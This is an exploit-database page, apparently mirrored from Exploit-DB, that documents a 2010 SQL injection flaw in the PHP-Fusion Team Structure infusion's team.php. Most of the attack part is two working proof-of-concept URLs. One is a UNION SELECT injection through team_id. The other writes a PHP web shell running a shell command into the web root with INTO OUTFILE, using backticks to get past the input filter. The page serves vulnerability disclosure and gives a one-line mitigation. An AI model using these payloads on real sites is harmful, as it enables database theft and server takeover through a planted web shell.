header-logo
Suggest Exploit
vendor:
PHP-fusion
by:
Saif El-Sherei
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP-fusion
Affected Version From: PHP-fusion 7.01..03
Affected Version To: PHP-fusion 7.01..03
Patch Exists: NO
Related CWE: N/A
CPE: a:php-fusion:php-fusion
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Firefox 3.0.15, IE 8
2010

PHP-fusion Team Structure Infusion (All versions) SQL injection

The 'team_id' variable is not sanitized before using in SQL query in 'team.php', allowing an attacker to elevate the attack to bypass PHP-Fusion's GET variable XSS filter by using back-ticks instead of brackets used in any php function in that case shell_exec(). The attack can be further escalated by writing a malicious file to the server.

Mitigation:

Ensure that all user-supplied input is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: PHP-fusion Team Structure Infusion (All versions) SQL
injection
# Date: 16-1-2010
# Author: Saif El-Sherei
# Software Link:
http://www.php-fusion.co.uk/infusions/addondb/view.php?addon_id=120
# Version: PHP-fusion (7.01..03), TeamStructure Infusion(all versions)
# Tested on: Firefox 3.0.15, , IE 8

Info:

Plugin that allows the site to have a list of all teams / clubs (eg football
or hockey) with the playing staff, displaying the standings with the
position of command or a list of the best strikers of a championship.

Details:

the "team_id" variable is not probably sanitized before using in SQL query
in "team.php", the attack can be elevated as shown in second POC to bypass
PHP-Fusion's GET variable XSS filter. by using back-ticks instead of
brackets used in any php function  in that case shell_exec().

Condition:

magic_quotes_gpc = Off

POC:


http://127.0.0.1/php-fusion/files/infusions/teams_structure/team.php?team_id=-1'
union select
'1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17

http://127.0.0.1/php-fusion/files/infusions/teams_structure/team.php?team_id=-1'
union select '1','2','<?php $out=`id`;echo $out;
?>','4','5','6','7','8','9','10','11','12','13','14','15','16','17' into
outfile '/var/www/php-fusion/files/images/test.php

Regards,

Saif El-Sherei

OSCP